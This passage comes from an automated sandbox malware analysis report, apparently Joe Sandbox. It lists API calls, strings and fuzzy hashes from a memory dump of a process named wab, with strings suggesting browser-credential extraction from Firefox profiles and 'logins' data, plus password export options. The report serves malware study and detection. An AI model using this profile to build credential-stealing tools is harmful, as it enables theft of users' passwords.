                  • wcscpy.MSVCRT ref: 004041E7
                  • memset.MSVCRT ref: 00404200
                  • memset.MSVCRT ref: 00404215
                  • _snwprintf.MSVCRT ref: 0040422F
                  • wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 0040426E
                  • memset.MSVCRT ref: 004042CD
                  • memset.MSVCRT ref: 004042E2
                  • _snwprintf.MSVCRT ref: 004042FE
                  • wcscpy.MSVCRT ref: 00404311
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                  • API String ID: 2454223109-1580313836
                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                  APIs
                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                  • SetMenu.USER32(?,00000000), ref: 00411453
                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                  • memcpy.MSVCRT ref: 004115C8
                  • ShowWindow.USER32(?,?), ref: 004115FE
                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                  • API String ID: 4054529287-3175352466
                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscat$_snwprintfmemset$wcscpy
                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                  • API String ID: 3143752011-1996832678
                  • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                  • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                  • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                  • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                  APIs
                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                  • API String ID: 667068680-2887671607
                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfmemset$wcscpy$wcscat
                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                  • API String ID: 1607361635-601624466
                  • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                  • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                  • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                  • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintf$memset$wcscpy
                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                  • API String ID: 2000436516-3842416460
                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                  APIs
                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                  • String ID:
                  • API String ID: 1043902810-0
                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@_snwprintfwcscpy
                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                  • API String ID: 2899246560-1542517562
                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                  APIs
                  • memset.MSVCRT ref: 0040DBCD
                  • memset.MSVCRT ref: 0040DBE9
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                  • wcscpy.MSVCRT ref: 0040DC2D
                  • wcscpy.MSVCRT ref: 0040DC3C
                  • wcscpy.MSVCRT ref: 0040DC4C
                  • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                  • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                  • wcscpy.MSVCRT ref: 0040DCC3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                  • API String ID: 3330709923-517860148
                  • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                  • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                  • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                  • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                  APIs
                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                  • memset.MSVCRT ref: 0040806A
                  • memset.MSVCRT ref: 0040807F
                  • _wtoi.MSVCRT ref: 004081AF
                  • _wcsicmp.MSVCRT ref: 004081C3
                  • memset.MSVCRT ref: 004081E4
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                  • String ID: logins$null
                  • API String ID: 3492182834-2163367763
                  • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                  • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                  • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                  • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                  APIs
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  • memset.MSVCRT ref: 004085CF
                  • memset.MSVCRT ref: 004085F1
                  • memset.MSVCRT ref: 00408606
                  • strcmp.MSVCRT ref: 00408645
                  • _mbscpy.MSVCRT ref: 004086DB
                  • _mbscpy.MSVCRT ref: 004086FA
                  • memset.MSVCRT ref: 0040870E
                  • strcmp.MSVCRT ref: 0040876B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                  • String ID: ---
                  • API String ID: 3437578500-2854292027
                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                  APIs
                  • memset.MSVCRT ref: 0041087D
                  • memset.MSVCRT ref: 00410892
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                  • GetSysColor.USER32(0000000F), ref: 00410999
                  • DeleteObject.GDI32(?), ref: 004109D0
                  • DeleteObject.GDI32(?), ref: 004109D6
                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                  • String ID:
                  • API String ID: 1010922700-0
                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                  APIs
                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                  • malloc.MSVCRT ref: 004186B7
                  • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                  • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                  • malloc.MSVCRT ref: 004186FE
                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$FullNamePath$malloc$Version
                  • String ID: |A
                  • API String ID: 4233704886-1717621600
                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp
                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                  • API String ID: 2081463915-1959339147
                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                  • API String ID: 2012295524-70141382
                  • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                  • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                  • API String ID: 667068680-3953557276
                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                  APIs
                  • GetDC.USER32(00000000), ref: 004121FF
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                  • SelectObject.GDI32(?,?), ref: 00412251
                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                  • SetCursor.USER32(00000000), ref: 004122BC
                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                  • memcpy.MSVCRT ref: 0041234D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                  • String ID:
                  • API String ID: 1700100422-0
                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                  APIs
                  • GetClientRect.USER32(?,?), ref: 004111E0
                  • GetWindowRect.USER32(?,?), ref: 004111F6
                  • GetWindowRect.USER32(?,?), ref: 0041120C
                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                  • GetWindowRect.USER32(00000000), ref: 0041124D
                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
